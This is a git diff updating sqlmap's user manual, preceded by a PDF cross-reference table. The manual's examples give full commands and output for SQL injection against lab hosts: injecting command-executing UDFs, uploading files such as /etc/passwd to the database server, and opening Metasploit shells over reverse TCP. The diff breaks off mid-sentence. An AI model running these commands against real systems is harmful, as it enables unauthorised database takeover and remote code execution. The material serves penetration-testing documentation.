n -0000310240 00000 n -0000310548 00000 n -0000310734 00000 n -0000310999 00000 n -0000311260 00000 n -0000311529 00000 n -0000311804 00000 n -0000312019 00000 n -0000312335 00000 n -0000312558 00000 n -0000312735 00000 n -0000312945 00000 n -0000313223 00000 n -0000313394 00000 n -0000313641 00000 n -0000313860 00000 n -0000314132 00000 n -0000314403 00000 n -0000314674 00000 n -0000314889 00000 n -0000315159 00000 n -0000315374 00000 n -0000315583 00000 n -0000316101 00000 n -0000316374 00000 n -0000316621 00000 n -0000317014 00000 n -0000317285 00000 n -0000317555 00000 n -0000317767 00000 n -0000317980 00000 n -0000318156 00000 n -0000318391 00000 n -0000318574 00000 n -0000318796 00000 n -0000318972 00000 n -0000319144 00000 n -0000319348 00000 n -0000319602 00000 n -0000319859 00000 n +0000308083 00000 n +0000308361 00000 n +0000308627 00000 n +0000308868 00000 n +0000309212 00000 n +0000309416 00000 n +0000309599 00000 n +0000309819 00000 n +0000310154 00000 n +0000310497 00000 n +0000310828 00000 n +0000311075 00000 n +0000311474 00000 n +0000311789 00000 n +0000312134 00000 n +0000312368 00000 n +0000312646 00000 n +0000312999 00000 n +0000313426 00000 n +0000313805 00000 n +0000314086 00000 n +0000314359 00000 n +0000314625 00000 n +0000314903 00000 n +0000315176 00000 n +0000315413 00000 n +0000315759 00000 n +0000315998 00000 n +0000316202 00000 n +0000316457 00000 n +0000316737 00000 n +0000316924 00000 n +0000317194 00000 n +0000317427 00000 n +0000317685 00000 n +0000317959 00000 n +0000318241 00000 n +0000318467 00000 n +0000318736 00000 n +0000318968 00000 n +0000319199 00000 n +0000319480 00000 n +0000319798 00000 n 0000320094 00000 n -0000320384 00000 n -0000320701 00000 n -0000320992 00000 n -0000321334 00000 n -0000321610 00000 n -0000321873 00000 n -0000322121 00000 n -0000322457 00000 n -0000322664 00000 n -0000322852 00000 n -0000323099 00000 n -0000323424 00000 n -0000323646 00000 n -0000323972 00000 n -0000324297 00000 n -0000324618 00000 n -0000324867 00000 n -0000325258 00000 n -0000325561 00000 n -0000325899 00000 n -0000326131 00000 n -0000326404 00000 n -0000326726 00000 n -0000327115 00000 n -0000327476 00000 n -0000327789 00000 n -0000328075 00000 n -0000328355 00000 n -0000328619 00000 n -0000328899 00000 n -0000329170 00000 n -0000329393 00000 n -0000329712 00000 n -0000329949 00000 n +0000320421 00000 n +0000320691 00000 n +0000320895 00000 n +0000321208 00000 n +0000321527 00000 n +0000321797 00000 n +0000322108 00000 n +0000322425 00000 n +0000322707 00000 n +0000323041 00000 n +0000323614 00000 n +0000324100 00000 n +0000324550 00000 n +0000325548 00000 n +0000325957 00000 n +0000326377 00000 n +0000326717 00000 n +0000326991 00000 n +0000327178 00000 n +0000327417 00000 n +0000327732 00000 n +0000328084 00000 n +0000328409 00000 n +0000328744 00000 n +0000329070 00000 n +0000329476 00000 n +0000329744 00000 n +0000329964 00000 n 0000330153 00000 n -0000330385 00000 n -0000330663 00000 n -0000330853 00000 n -0000331112 00000 n -0000331341 00000 n -0000331611 00000 n -0000331889 00000 n -0000332173 00000 n -0000332395 00000 n -0000332672 00000 n -0000332905 00000 n -0000333140 00000 n -0000333405 00000 n -0000333720 00000 n -0000334012 00000 n -0000334313 00000 n -0000334578 00000 n -0000334848 00000 n -0000335051 00000 n -0000335361 00000 n -0000335678 00000 n -0000335948 00000 n -0000336256 00000 n -0000336581 00000 n -0000336860 00000 n -0000337207 00000 n -0000337780 00000 n -0000338305 00000 n -0000338774 00000 n -0000339885 00000 n -0000340087 00000 n -0000340457 00000 n -0000340846 00000 n -0000341023 00000 n -0000341362 00000 n -0000341631 00000 n -0000342007 00000 n -0000342378 00000 n -0000342634 00000 n -0000343006 00000 n -0000343529 00000 n -0000343753 00000 n -0000343941 00000 n -0000344128 00000 n -0000345445 00000 n -0000347473 00000 n -0000347593 00000 n -0000347713 00000 n -0000347801 00000 n -0000347883 00000 n -0000354798 00000 n -0000354972 00000 n -0000355143 00000 n -0000355312 00000 n -0000355481 00000 n -0000355652 00000 n -0000355822 00000 n -0000355993 00000 n -0000356163 00000 n -0000356334 00000 n -0000356504 00000 n -0000356675 00000 n -0000356845 00000 n -0000357016 00000 n -0000357183 00000 n -0000357366 00000 n -0000357574 00000 n -0000357797 00000 n -0000358024 00000 n -0000358299 00000 n -0000358563 00000 n -0000358827 00000 n -0000359094 00000 n -0000359361 00000 n -0000359632 00000 n -0000359901 00000 n -0000360168 00000 n -0000360345 00000 n -0000360463 00000 n -0000360579 00000 n -0000360702 00000 n -0000360844 00000 n -0000360958 00000 n -0000361079 00000 n -0000361119 00000 n -0000361251 00000 n +0000330467 00000 n +0000330733 00000 n +0000331046 00000 n +0000331383 00000 n +0000331634 00000 n +0000331975 00000 n +0000332243 00000 n +0000332512 00000 n +0000332903 00000 n +0000333295 00000 n +0000333514 00000 n +0000333897 00000 n +0000334284 00000 n +0000334591 00000 n +0000334958 00000 n +0000335354 00000 n +0000335929 00000 n +0000336227 00000 n +0000336621 00000 n +0000337109 00000 n +0000337293 00000 n +0000337460 00000 n +0000337768 00000 n +0000337954 00000 n +0000338219 00000 n +0000338480 00000 n +0000338749 00000 n +0000339024 00000 n +0000339239 00000 n +0000339555 00000 n +0000339778 00000 n +0000339955 00000 n +0000340165 00000 n +0000340443 00000 n +0000340614 00000 n +0000340861 00000 n +0000341080 00000 n +0000341352 00000 n +0000341623 00000 n +0000341894 00000 n +0000342109 00000 n +0000342379 00000 n +0000342594 00000 n +0000342803 00000 n +0000343321 00000 n +0000343594 00000 n +0000343841 00000 n +0000344234 00000 n +0000344505 00000 n +0000344775 00000 n +0000344987 00000 n +0000345200 00000 n +0000345376 00000 n +0000345611 00000 n +0000345794 00000 n +0000346016 00000 n +0000346192 00000 n +0000346364 00000 n +0000346618 00000 n +0000346875 00000 n +0000347110 00000 n +0000347400 00000 n +0000347717 00000 n +0000348008 00000 n +0000348350 00000 n +0000348626 00000 n +0000348889 00000 n +0000349137 00000 n +0000349473 00000 n +0000349680 00000 n +0000349868 00000 n +0000350193 00000 n +0000350415 00000 n +0000350741 00000 n +0000351066 00000 n +0000351387 00000 n +0000351636 00000 n +0000352027 00000 n +0000352330 00000 n +0000352668 00000 n +0000352900 00000 n +0000353173 00000 n +0000353495 00000 n +0000353884 00000 n +0000354245 00000 n +0000354558 00000 n +0000354844 00000 n +0000355124 00000 n +0000355388 00000 n +0000355668 00000 n +0000355939 00000 n +0000356162 00000 n +0000356481 00000 n +0000356718 00000 n +0000356922 00000 n +0000357154 00000 n +0000357432 00000 n +0000357622 00000 n +0000357881 00000 n +0000358110 00000 n +0000358380 00000 n +0000358658 00000 n +0000358942 00000 n +0000359164 00000 n +0000359441 00000 n +0000359674 00000 n +0000359909 00000 n +0000360174 00000 n +0000360489 00000 n +0000360781 00000 n +0000361082 00000 n +0000361347 00000 n +0000361617 00000 n +0000361820 00000 n +0000362130 00000 n +0000362447 00000 n +0000362717 00000 n +0000363025 00000 n +0000363350 00000 n +0000363629 00000 n +0000363976 00000 n +0000364549 00000 n +0000365066 00000 n +0000365527 00000 n +0000366610 00000 n +0000366812 00000 n +0000367182 00000 n +0000367571 00000 n +0000367748 00000 n +0000368087 00000 n +0000368356 00000 n +0000368732 00000 n +0000369103 00000 n +0000369359 00000 n +0000369731 00000 n +0000370254 00000 n +0000370478 00000 n +0000370666 00000 n +0000370853 00000 n +0000372662 00000 n +0000372897 00000 n +0000374105 00000 n +0000376392 00000 n +0000376512 00000 n +0000376632 00000 n +0000376728 00000 n +0000376810 00000 n +0000385228 00000 n +0000385402 00000 n +0000385573 00000 n +0000385742 00000 n +0000385911 00000 n +0000386082 00000 n +0000386252 00000 n +0000386423 00000 n +0000386593 00000 n +0000386764 00000 n +0000386934 00000 n +0000387105 00000 n +0000387275 00000 n +0000387446 00000 n +0000387615 00000 n +0000387784 00000 n +0000387963 00000 n +0000388166 00000 n +0000388390 00000 n +0000388618 00000 n +0000388863 00000 n +0000389138 00000 n +0000389413 00000 n +0000389685 00000 n +0000389949 00000 n +0000390217 00000 n +0000390484 00000 n +0000390751 00000 n +0000391020 00000 n +0000391291 00000 n +0000391558 00000 n +0000391705 00000 n +0000391823 00000 n +0000391939 00000 n +0000392063 00000 n +0000392200 00000 n +0000392341 00000 n +0000392436 00000 n +0000392566 00000 n +0000392606 00000 n +0000392738 00000 n trailer -<< /Size 1311 -/Root 1309 0 R -/Info 1310 0 R -/ID [<724388F2140A00FDFF2EF29C03A25D42> <724388F2140A00FDFF2EF29C03A25D42>] >> +<< /Size 1457 +/Root 1455 0 R +/Info 1456 0 R +/ID [ ] >> startxref -361571 +393058 %%EOF diff --git a/doc/README.sgml b/doc/README.sgml index e4aa25ea0..92d02520b 100644 --- a/doc/README.sgml +++ b/doc/README.sgml @@ -35,7 +35,7 @@ requires the Python interpreter version equal or above to 2.5. The interpreter is freely downloadable from its . To make it even easier, many GNU/Linux distributions come out of the box -with Python interpreter installed and other Unices and MacOS X too provide +with Python interpreter installed and other Unices and Mac OSX too provide it packaged in their formats and ready to be installed. Windows users can download and install the Python setup-ready installer for x86, AMD64 and Itanium too. @@ -61,8 +61,9 @@ history support functionalities in the SQL shell and OS shell. Note that these functionalities are available natively by Python standard library on other operating systems. -You can also choose to install -library to speed up the sqlmap algorithmic operations. + +You can also choose to install library to speed up the sqlmap algorithmic operations. Scenario @@ -192,6 +193,14 @@ execution depending on the underlying back-end database management system and the session user privileges. +Demo + +

      +You can watch several demo videos, they are hosted on and linked +from . + Features @@ -333,11 +342,10 @@ inject it and how to pack the SQL payload accordingly. Takeover features

      -Some of these techniques are detailed in white paper +Some of these techniques are detailed in the white paper and -slides and in the +slide deck . @@ -537,9 +545,9 @@ Options: -a USERAGENTSFILE Load a random HTTP User-Agent header from file --referer=REFERER HTTP Referer header --headers=HEADERS Extra HTTP headers newline separated - --auth-type=ATYPE HTTP Authentication type (Basic, Digest or NTLM) - --auth-cred=ACRED HTTP Authentication credentials (name:password) - --auth-cert=ACERT HTTPs Authentication certificate (key_file,cert_file) + --auth-type=ATYPE HTTP authentication type (Basic, Digest or NTLM) + --auth-cred=ACRED HTTP authentication credentials (name:password) + --auth-cert=ACERT HTTP authentication certificate (key_file,cert_file) --proxy=PROXY Use a HTTP proxy to connect to the target url --ignore-proxy Ignore system default HTTP proxy --threads=THREADS Maximum number of concurrent HTTP requests (default 1) @@ -679,7 +687,7 @@ Example on a MySQL 5.0.67 target (verbosity level 1): $ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 1 -[hh:mm:58] [INFO] using '/home/inquis/software/sqlmap/subversion/trunk/sqlmap/output/172.16.213.131/session' as session file +[hh:mm:58] [INFO] using '/home/inquis/sqlmap/output/172.16.213.131/session' as session file [hh:mm:58] [INFO] testing connection to the target url [hh:mm:58] [INFO] testing if the url is stable, wait a few seconds [hh:mm:59] [INFO] url is stable @@ -716,7 +724,7 @@ $ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 2 [hh:mm:22] [DEBUG] setting the HTTP method to GET [hh:mm:22] [DEBUG] creating HTTP requests opener object [hh:mm:22] [DEBUG] parsing XML queries file -[hh:mm:22] [INFO] using '/home/inquis/software/sqlmap/subversion/trunk/sqlmap/output/172.16.213.131/session' as session file +[hh:mm:22] [INFO] using '/home/inquis/sqlmap/output/172.16.213.131/session' as session file [hh:mm:22] [INFO] testing connection to the target url [hh:mm:22] [INFO] testing if the url is stable, wait a few seconds [hh:mm:23] [INFO] url is stable @@ -756,7 +764,7 @@ $ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 3 [hh:mm:53] [DEBUG] setting the HTTP method to GET [hh:mm:53] [DEBUG] creating HTTP requests opener object [hh:mm:53] [DEBUG] parsing XML queries file -[hh:mm:53] [INFO] using '/home/inquis/software/sqlmap/subversion/trunk/sqlmap/output/172.16.213.131/session' as session file +[hh:mm:53] [INFO] using '/home/inquis/sqlmap/output/172.16.213.131/session' as session file [hh:mm:53] [INFO] testing connection to the target url [hh:mm:53] [TRAFFIC OUT] HTTP request: GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1 @@ -764,7 +772,7 @@ Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 172.16.213.131 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 -User-agent: sqlmap/0.8-rc7 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.8 Connection: close [...] [hh:mm:54] [INFO] testing MySQL @@ -774,7 +782,7 @@ Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 172.16.213.131 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 -User-agent: sqlmap/0.8-rc7 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.8 Connection: close [...] @@ -793,7 +801,7 @@ $ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 4 [hh:mm:20] [DEBUG] setting the HTTP method to GET [hh:mm:20] [DEBUG] creating HTTP requests opener object [hh:mm:20] [DEBUG] parsing XML queries file -[hh:mm:20] [INFO] using '/home/inquis/software/sqlmap/subversion/trunk/sqlmap/output/172.16.213.131/session' as session file +[hh:mm:20] [INFO] using '/home/inquis/sqlmap/output/172.16.213.131/session' as session file [hh:mm:20] [INFO] testing connection to the target url [hh:mm:20] [TRAFFIC OUT] HTTP request: GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1 @@ -801,7 +809,7 @@ Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 172.16.213.131 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 -User-agent: sqlmap/0.8-rc7 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.8 Connection: close [hh:mm:20] [TRAFFIC IN] HTTP response (OK - 200): @@ -828,7 +836,7 @@ $ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 5 [hh:mm:47] [DEBUG] setting the HTTP method to GET [hh:mm:47] [DEBUG] creating HTTP requests opener object [hh:mm:47] [DEBUG] parsing XML queries file -[hh:mm:47] [INFO] using '/home/inquis/software/sqlmap/subversion/trunk/sqlmap/output/172.16.213.131/session' as session file +[hh:mm:47] [INFO] using '/home/inquis/sqlmap/output/172.16.213.131/session' as session file [hh:mm:47] [INFO] testing connection to the target url [hh:mm:47] [TRAFFIC OUT] HTTP request: GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1 @@ -836,7 +844,7 @@ Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 172.16.213.131 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 -User-agent: sqlmap/0.8-rc7 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.8 Connection: close [hh:mm:47] [TRAFFIC IN] HTTP response (OK - 200): @@ -1118,7 +1126,7 @@ back-end DBMS: Oracle HTTP Cookie header

      -Options: --cookie, --drop-set-cookie and --cookie-urlencode +Options: --cookie, --cookie-urlencode and --drop-set-cookie

      This feature can be useful in two scenarios: @@ -1370,7 +1378,7 @@ to provide them from the configuration INI file. Have a look at the sample sqlmap.conf file. -HTTPs Basic, Digest and NTLM authentications +HTTP Basic, Digest and NTLM authentications

      Options: --auth-type and --auth-cred @@ -1426,7 +1434,7 @@ Connection: close -HTTPs Certificate authentication +HTTP Certificate authentication

      Option: --auth-cert @@ -1450,7 +1458,7 @@ $ python sqlmap.py -u "http://www.example.com/process.php?id=1" \ HTTP proxy

      -Option: --proxy +Option: --proxy and --ignore-proxy

      It is possible to provide an anonymous HTTP proxy address to pass by the @@ -1487,15 +1495,10 @@ $ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" \ Note that 8118 is the default Privoxy port, adapt it to your settings. - -Ignoring system default HTTP proxy -

      -Option: --ignore-proxy - -This option should be used in cases like when you want to run sqlmap -against the machine inside a local area network skipping default -usage of a system-wide set HTTP proxy server. +The option --ignore-proxy should be used in cases like +when you want to run sqlmap against the machine inside a local area +network skipping default usage of a system-wide set HTTP proxy server. Concurrent HTTP requests @@ -2102,7 +2105,7 @@ stacked queries support: 'id=1; SELECT pg_sleep(5);-- AND 3128=3128' Example on a Microsoft SQL Server 2005 Service Pack 0 target: -$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" \ +$ python sqlmap.py -u "http://172.16.213.36/sqlmap/get_str.asp?name=luther" \ --stacked-test -v 1 [...] @@ -2165,7 +2168,7 @@ time based blind sql injection payload: 'id=1; SELECT pg_sleep(5);-- AND 9644 Example on a Microsoft SQL Server 2005 Service Pack 0 target: -$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" \ +$ python sqlmap.py -u "http://172.16.213.36/sqlmap/get_str.asp?name=luther" \ --time-test -v 1 [...] @@ -2240,7 +2243,7 @@ back-end DBMS: PostgreSQL [hh:mm:51] [INFO] testing inband sql injection on parameter 'id' with ORDER BY clause bruteforcing technique [hh:mm:51] [INFO] the target url could be affected by an inband sql injection vulnerability -valid union: 'http://192.168.1.150:80/sqlmap/pgsql/get_int.php?id=1 ORDER BY 3-- AND +valid union: 'http://172.16.213.150:80/sqlmap/pgsql/get_int.php?id=1 ORDER BY 3-- AND 1262=1262' @@ -2559,7 +2562,7 @@ back-end DBMS: active fingerprint: Microsoft SQL Server 2000 Example on a Microsoft SQL Server 2005 Service Pack 0 target: -$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f +$ python sqlmap.py -u "http://172.16.213.36/sqlmap/get_str.asp?name=luther" -v 1 -f [...] [hh:mm:41] [WARNING] the back-end DMBS is not PostgreSQL @@ -2649,7 +2652,7 @@ back-end DBMS: active fingerprint: Microsoft SQL Server 2000 Example on a Microsoft SQL Server 2005 Service Pack 0 target: -$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 2 -f -b +$ python sqlmap.py -u "http://172.16.213.36/sqlmap/get_str.asp?name=luther" -v 2 -f -b [...] [hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL @@ -2750,7 +2753,7 @@ Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Example on a Microsoft SQL Server 2005 Service Pack 0 target: -$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 0 -b +$ python sqlmap.py -u "http://172.16.213.36/sqlmap/get_str.asp?name=luther" -v 0 -b banner: --- @@ -3518,15 +3521,15 @@ which table(s) of database 'testdb'? [s]kip [q]uit > -[19:18:23] [INFO] fetching columns 'surname' entries for table 'users' on +[hh:mm:23] [INFO] fetching columns 'surname' entries for table 'users' on database 'testdb' -[19:18:23] [INFO] fetching number of columns 'surname' entries for table +[hh:mm:23] [INFO] fetching number of columns 'surname' entries for table 'users' on database 'testdb' -[19:18:23] [INFO] retrieved: 4 -[19:18:23] [INFO] retrieved: blissett -[19:18:23] [INFO] retrieved: bunny -[19:18:23] [INFO] retrieved: ming -[19:18:23] [INFO] retrieved: nameisnull +[hh:mm:23] [INFO] retrieved: 4 +[hh:mm:23] [INFO] retrieved: blissett +[hh:mm:23] [INFO] retrieved: bunny +[hh:mm:23] [INFO] retrieved: ming +[hh:mm:23] [INFO] retrieved: nameisnull Database: testdb Table: users [4 entries] @@ -3566,7 +3569,7 @@ Table: users | 5 | | nameisnull | +----+----------------------------------------------+-------------------+ -[hh:mm:59] [INFO] Table 'public.users' dumped to CSV file '/software/sqlmap/output/ +[hh:mm:59] [INFO] Table 'public.users' dumped to CSV file '/home/inquis/sqlmap/output/ 172.16.213.131/dump/public/users.csv' [...] @@ -3742,7 +3745,7 @@ considered a system database because some database administrators use it as a users' database. -Execute your SQL statement +Execute custom SQL statement

      Options: --sql-query and --sql-shell @@ -4124,8 +4127,51 @@ support when the back-end DBMS is PostgreSQL.

      Options: --udf-inject and --shared-lib -#TODO +

      +You can inject your own user-defined functions (UDFs) by compiling a +MySQL or PostgreSQL shared library, DLL for Windows and shared object for +Linux/Unix, then provide sqlmap with the path where the shared library +is stored locally on your machine. sqlmap will then ask you some +questions, upload the shared library on the database server file system, +create the user-defined function(s) from it and, depending on your +options, execute them. When you are finished using the injected UDFs, +sqlmap can also remove them from the database for you. + +

      +Example on a PostgreSQL 8.4: + + +$ python sqlmap.py -u http://172.16.213.131/sqlmap/pgsql/get_int8.4.php?id=1 --udf-inject -v 0 + +[...] +web application technology: PHP 5.2.6, Apache 2.2.9 +back-end DBMS: PostgreSQL + +which is the local path of the shared library? udf/postgresql/linux/8.4/lib_postgresqludf_sys.so +how many user-defined functions do you want to create from the shared library? 1 +what is the name of the UDF number 1? sys_eval +how many input parameters takes UDF 'sys_eval'? (default: 1) +what is the data-type of input parameter number 1? (default: text) +what is the data-type of the return value? (default: text) +do you want to call your injected user-defined functions now? [Y/n/q] y +which UDF do you want to call? +[1] sys_eval +[q] Quit +> 1 +what is the value of the parameter number 1 (data-type: text)? echo test +do you want to retrieve the return value of the UDF? [Y/n] +return value: 'test' + +do you want to call this or another injected UDF? [Y/n] n +do you want to remove UDF 'sys_eval'? [Y/n] +[12:00:10] [WARNING] remember that UDF shared object files saved on the file system can only +be deleted manually + + +

      +If you want, you can specify the shared library local file system path +via command line using --shared-lib option. File system access @@ -4141,11 +4187,12 @@ PostgreSQL or Microsoft SQL Server, and the session user has the needed privileges to abuse database specific functionalities and architectural weaknesses. The file specified can be either a text or a binary file. sqlmap will -handle either cases automatically. +handle it automatically.

      -These techniques are detailed in white paper -. +These techniques are detailed in the white paper +.

      Example on a PostgreSQL 8.3.5 target to retrieve a text file: @@ -4258,16 +4305,17 @@ output/172.16.213.131/files/C__example.exe: PE32 executable for MS Windows (GUI) Options: --write-file and --dest-file

      -It is possible to upload a local file to the underlying file system when -the back-end database management system is either MySQL, PostgreSQL or -Microsoft SQL Server, and the session user has the needed privileges to +It is possible to upload a local file to the database server file system +when the back-end database management system is either MySQL, PostgreSQL +or Microsoft SQL Server, and the session user has the needed privileges to abuse database specific functionalities and architectural weaknesses. The file specified can be either a text or a binary file. sqlmap will -handle either cases automatically. +handle it automatically.

      -These techniques are detailed in white paper -. +These techniques are detailed in the white paper +.

      Example on a MySQL 5.0.67 target to upload a binary UPX-compressed @@ -4303,6 +4351,32 @@ written on the back-end DBMS file system? [Y/n] y same size as the local file '/tmp/nc.exe.packed' +

      +Example on a PostgreSQL 8.4 target to upload a text file: + + +$ python sqlmap.py -u http://172.16.213.131/sqlmap/pgsql/get_int8.4.php?id=1 \ + --write-file /etc/passwd --dest-file /tmp/writtenfrompgsql -v 1 + +[...] +web application technology: PHP 5.2.6, Apache 2.2.9 +back-end DBMS: PostgreSQL + +[hh:mm:01] [INFO] testing stacked queries support on parameter 'id' +[hh:mm:01] [INFO] detecting back-end DBMS version from its banner +[hh:mm:01] [INFO] retrieved: 8.4.2 +[hh:mm:07] [INFO] the web application supports stacked queries on parameter 'id' +[hh:mm:07] [INFO] fingerprinting the back-end DBMS operating system +[hh:mm:07] [INFO] retrieved: 0 +[hh:mm:07] [INFO] retrieved: 0 +[hh:mm:07] [INFO] the back-end DBMS operating system is Linux +do you want confirmation that the file '/tmp/writtenfrompgsql' has been successfully +written on the back-end DBMS file system? [Y/n] +[hh:mm:14] [INFO] retrieved: 2264 +[hh:mm:14] [INFO] the file has been successfully written and its size is 2264 bytes, +same size as the local file '/etc/passwd' + + Operating system access @@ -4320,24 +4394,25 @@ weaknesses.

      On MySQL and PostgreSQL, sqlmap uploads (via the file upload functionality -demonstrated above) a shared library (binary file) containing two +explained above) a shared library (binary file) containing two user-defined functions, sys_exec() and sys_eval(), then it creates these two functions on the database and call one of them to execute the specified command, depending on the user's choice to display the standard output or not. On Microsoft SQL Server, sqlmap abuses the xp_cmshell stored -procedure: if it's disable sqlmap re-enables it, if it does not exist, +procedure: if it's disabled, sqlmap re-enables it; if it does not exist, sqlmap creates it from scratch.

      If the user wants to retrieve the command standard output, sqlmap will use one of the enumeration SQL injection techniques (blind or inband) to -retrieve it, or in case of stacked query SQL injection technique +retrieve it or, in case of stacked query SQL injection technique, sqlmap will execute the command without returning anything to the user.

      -These techniques are detailed in white paper -. +These techniques are detailed in the white paper +.

      It is possible to specify a single command to be executed with the @@ -4417,7 +4492,7 @@ nt authority\network service

      It is also possible to simulate a real shell where you can type as many arbitrary commands as you wish. The option is --os-shell and has -the same TAB completion and history functionalities as provided by +the same TAB completion and history functionalities like --sql-shell.

      @@ -4620,7 +4695,7 @@ Ethernet adapter Local Area Connection 2: Connection-specific DNS Suffix . : localdomain IP Address. . . . . . . . . . . . : 172.16.213.131 Subnet Mask . . . . . . . . . . . : 255.255.255.0 ----Default Gateway . . . . . . . . . : 192.168.1.1 +---Default Gateway . . . . . . . . . : 172.16.213.1 os-shell> exit [hh:mm:41] [INFO] cleaning up the database management system @@ -4640,107 +4715,121 @@ user-defined functions are already created, if so, it asks the user if he wants to recreate them or keep them and save time. -Prompt for an out-of-band shell, meterpreter or VNC +Prompt for an out-of-band shell, Meterpreter or VNC

      Options: --os-pwn, --priv-esc, --msf-path and --tmp-path

      -It is possible to establish an out-of-band TCP stateful channel -between the attacker and the underlying operating system by using the -exploited SQL injection as a stepping stone. This is implemented for MySQL, -PostgreSQL and Microsoft SQL Server. -sqlmap relies on the to perform this attack, so you need to have it already -on your system - it's free and can be downloaded from the homepage. It is -required to use Metasploit Framework version 3.3.3 or above. +It is possible to establish an out-of-band stateful TCP connection +between the user machine and the database server underlying operating +system. This channel can be an interactive command prompt, a Meterpreter +session or a graphical user interface (VNC) session as per user's choice. +sqlmap relies on Metasploit to create the shellcode and implements four +different techniques to execute it on the database server. These +techniques are: + +Database in-memory execution of the Metasploit's shellcode +via sqlmap own user-defined function sys_bineval(). Supported on +MySQL and PostgreSQL. +Upload and execution of a Metasploit's stand-alone payload +stager via sqlmap own user-defined function sys_exec() on +MySQL and PostgreSQL or via xp_cmdshell() on Microsoft SQL +Server. +Execution of Metasploit's shellcode by performing a SMB +reflection attack () with a UNC path request from the database server to +the user's machine where the Metasploit smb_relay server exploit +runs. +Database in-memory execution of the Metasploit's shellcode by +exploiting Microsoft SQL Server 2000 and 2005 +sp_replwritetovarbin stored procedure heap-based buffer +overflow () with automatic DEP bypass. +

      Note that this feature is not supported by sqlmap running on Windows -because Metasploit's msfconsole and msfcli are not supported on the native -Windows Ruby interpreter. +because it relies on Metasploit's msfcli which is not +available for Windows.

      -These techniques are detailed in white paper -. +These techniques are detailed in the white paper + and in the +slide deck .

      -Example on a MySQL 5.0.67 target: +Example on a MySQL 5.1 target: -$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.aspx?id=1" \ +$ python sqlmap.py -u "http://172.16.213.128/sqlmap/mysql/get_int_51.aspx?id=1" \ --os-pwn -v 1 --msf-path /home/inquis/software/metasploit [...] -[hh:mm:17] [INFO] the back-end DBMS is MySQL web server operating system: Windows 2003 or 2008 web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 back-end DBMS: MySQL >= 5.0.0 -[hh:mm:17] [INFO] testing stacked queries support on parameter 'id' -[hh:mm:17] [INFO] detecting back-end DBMS version from its banner -[hh:mm:17] [INFO] retrieved: 5.0.67 -[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'id' -[hh:mm:23] [INFO] fingerprinting the back-end DBMS operating system -[hh:mm:23] [INFO] retrieved: C -[hh:mm:23] [INFO] the back-end DBMS operating system is Windows -[hh:mm:23] [INFO] testing if current user is DBA -[hh:mm:23] [INFO] retrieved: 1 -[hh:mm:23] [INFO] checking if sys_exec UDF already exist -[hh:mm:23] [INFO] retrieved: 1 -[hh:mm:24] [INFO] sys_exec UDF already exists, do you want to overwrite it? [y/N] N -[hh:mm:24] [INFO] checking if sys_eval UDF already exist -[hh:mm:24] [INFO] retrieved: 1 -[hh:mm:24] [INFO] sys_eval UDF already exists, do you want to overwrite it? [y/N] N -[hh:mm:24] [INFO] creating Metasploit Framework 3 payload stager -[hh:mm:24] [INFO] which connection type do you want to use? -[1] Bind TCP (default) -[2] Bind TCP (No NX) -[3] Reverse TCP -[4] Reverse TCP (No NX) +[hh:mm:09] [INFO] testing stacked queries support on parameter 'id' +[hh:mm:09] [INFO] detecting back-end DBMS version from its banner +[hh:mm:09] [INFO] retrieved: 5.1.30 +[hh:mm:18] [INFO] the web application supports stacked queries on parameter 'id' +[hh:mm:18] [INFO] fingerprinting the back-end DBMS operating system +[hh:mm:18] [INFO] retrieved: C +[hh:mm:19] [INFO] the back-end DBMS operating system is Windows +[hh:mm:19] [INFO] testing if current user is DBA +[hh:mm:19] [INFO] retrieved: 1 +[hh:mm:20] [INFO] checking if UDF 'sys_bineval' already exist +[hh:mm:20] [INFO] retrieved: 0 +[hh:mm:21] [INFO] checking if UDF 'sys_exec' already exist +[hh:mm:21] [INFO] retrieved: 0 +[hh:mm:21] [INFO] retrieving MySQL base directory absolute path +[hh:mm:21] [INFO] retrieved: C:\Program Files\MySQL\MySQL Server 5.1\ +[hh:mm:46] [WARNING] this will only work if the database administrator created manually +the 'C:/Program Files/MySQL/MySQL Server 5.1/lib/plugin' subfolder +[hh:mm:47] [INFO] creating UDF 'sys_bineval' from the binary UDF file +[hh:mm:47] [INFO] creating UDF 'sys_exec' from the binary UDF file +how do you want to execute the Metasploit 